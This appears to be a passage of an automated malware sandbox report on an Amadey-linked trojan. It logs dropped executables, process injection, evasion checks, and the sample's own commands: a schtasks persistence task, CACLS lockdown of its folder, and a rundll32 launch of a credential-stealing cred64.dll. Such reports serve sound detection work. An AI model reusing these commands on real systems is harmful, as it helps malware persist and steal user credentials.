                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_00401605 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_00401609 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_00401617 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_004015D4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_004015EA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_004015EE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_00402693 NtOpenKey,NtEnumerateKey,NtEnumerateKey,
                              Source: kmxId0uLRn.exeStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: thgcici.1.drStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: 8F68.exe.1.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_EXPORT size: 0x100 address: 0x0
                              Source: kmxId0uLRn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\thgciciJump to behavior
                              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@51/18@28/6
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: kmxId0uLRn.exeReversingLabs: Detection: 69%
                              Source: kmxId0uLRn.exeVirustotal: Detection: 60%
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: unknownProcess created: C:\Users\user\Desktop\kmxId0uLRn.exe C:\Users\user\Desktop\kmxId0uLRn.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\thgcici C:\Users\user\AppData\Roaming\thgcici
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8F68.exe C:\Users\user\AppData\Local\Temp\8F68.exe
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9545.exe C:\Users\user\AppData\Local\Temp\9545.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 268
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe"
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F
                              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\2c33368f7d" /P "user:N"&&CACLS "..\2c33368f7d" /P "user:R" /E&&Exit
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:N"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:R" /E
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Main
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\thgcici C:\Users\user\AppData\Roaming\thgcici
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8F68.exe C:\Users\user\AppData\Local\Temp\8F68.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9545.exe C:\Users\user\AppData\Local\Temp\9545.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe"
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\2c33368f7d" /P "user:N"&&CACLS "..\2c33368f7d" /P "user:R" /E&&Exit
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Main
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:N"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:R" /E
                              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8F68.tmpJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Main
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_01
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1568
                              Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\ec3ccaac0e84032af3ffe6a4a2668066
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeMutant created: \Sessions\1\BaseNamedObjects\bf045808586a2473c5a7441da6f3bfa9
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4944:120:WilError_01
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:120:WilError_01
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                              Source: kmxId0uLRn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: /C:\ziperokelodofu\gukeheyamufuji\cutovalajoz_cowadulolidako3.pdb source: kmxId0uLRn.exe, thgcici.1.dr
                              Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 9545.exe, 0000000E.00000000.403314322.0000000000E00000.00000002.00000001.01000000.0000000A.sdmp, 9545.exe, 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmp, 9545.exe, 0000000E.00000003.404330166.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000000.418195979.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 00000015.00000002.789042996.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000001D.00000000.425079213.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000001D.00000002.430617953.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000002C.00000000.542142836.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000002C.00000002.547939259.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe.14.dr, 9545.exe.1.dr
                              Source: Binary string: C:\ziperokelodofu\gukeheyamufuji\cutovalajoz_cowadulolidako3.pdb source: kmxId0uLRn.exe, thgcici.1.dr

                              Data Obfuscation

                              barindex
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeUnpacked PE file: 0.2.kmxId0uLRn.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                              Source: C:\Users\user\AppData\Roaming\thgciciUnpacked PE file: 11.2.thgcici.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                              Source: C:\Users\user\AppData\Roaming\thgciciUnpacked PE file: 43.2.thgcici.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C120E0 push eax; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C370DD push esi; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C350F9 push esp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C351FF push ebp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3519C push ebp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C351A8 push ebp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C351AC push ebp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C351B4 push ebp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C351BC push ebp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C35147 push esp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C35101 push esp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3511C push esp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3512F push esp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C35134 push esp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3513F push esp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352C7 push ebp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352CF push ebp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352D4 push ebp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352E1 push esi; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352F4 push esi; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352FC push esi; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3529C push ebp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352A4 push ebp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352B4 push ebp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C35274 push ebp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3522F push ebp; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C35358 push edi; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C35374 push edi; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C35304 push esi; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3530C push esi; ret
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3531C push edi; ret

                              Persistence and Installation Behavior

                              barindex
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000003.499443031.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000002.783235470.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: gntuud.exe PID: 5972, type: MEMORYSTR
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\thgciciJump to dropped file
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8F68.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeFile created: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dllJump to dropped file
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\thgciciJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeFile created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeJump to dropped file
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9545.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllJump to dropped file

                              Boot Survival

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\kmxid0ulrn.exeJump to behavior
                              Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\thgcici:Zone.Identifier read attributes | delete
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Windows\explorer.exe TID: 848Thread sleep count: 656 > 30
                              Source: C:\Windows\explorer.exe TID: 4496Thread sleep count: 1110 > 30
                              Source: C:\Windows\explorer.exe TID: 4496Thread sleep time: -111000s >= -30000s
                              Source: C:\Windows\explorer.exe TID: 4836Thread sleep count: 1051 > 30
                              Source: C:\Windows\explorer.exe TID: 4836Thread sleep time: -105100s >= -30000s
                              Source: C:\Windows\explorer.exe TID: 5312Thread sleep count: 553 > 30
                              Source: C:\Windows\explorer.exe TID: 5324Thread sleep count: 917 > 30
                              Source: C:\Windows\explorer.exe TID: 5324Thread sleep time: -91700s >= -30000s
                              Source: C:\Windows\explorer.exe TID: 5348Thread sleep count: 874 > 30
                              Source: C:\Windows\explorer.exe TID: 5348Thread sleep time: -87400s >= -30000s
                              Source: C:\Windows\explorer.exe TID: 320Thread sleep count: 373 > 30
                              Source: C:\Windows\explorer.exe TID: 6084Thread sleep count: 442 > 30
                              Source: C:\Windows\explorer.exe TID: 6084Thread sleep time: -44200s >= -30000s
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 2072Thread sleep count: 121 > 30
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 2072Thread sleep time: -121000s >= -30000s
                              Source: C:\Windows\explorer.exe TID: 684Thread sleep count: 105 > 30
                              Source: C:\Windows\explorer.exe TID: 684Thread sleep time: -105000s >= -30000s
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 3680Thread sleep count: 120 > 30
